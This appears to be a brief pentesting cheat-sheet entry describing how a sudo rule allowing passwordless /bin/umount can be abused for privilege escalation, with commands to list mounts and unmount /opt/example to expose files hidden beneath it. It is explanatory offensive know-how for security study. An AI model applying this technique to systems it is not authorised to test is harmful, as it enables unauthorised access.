Sudo Umount Privilege Escalation
Last modified: 2023-02-15
Sudo umount is vulnerable to privilege escalation.
sudo -l (root) NOPASSWD: /bin/umount
If we can execute umount command as root, we can escalate to privilege.
In target machine, check what directory is mounted.
cat /etc/fstab showmount -e localhost
/opt/example folder is mounted.
If we unmount this folder, original files, that existed before the directory is mounted, may appear.
sudo /bin/umount /opt/example ls -al /opt/example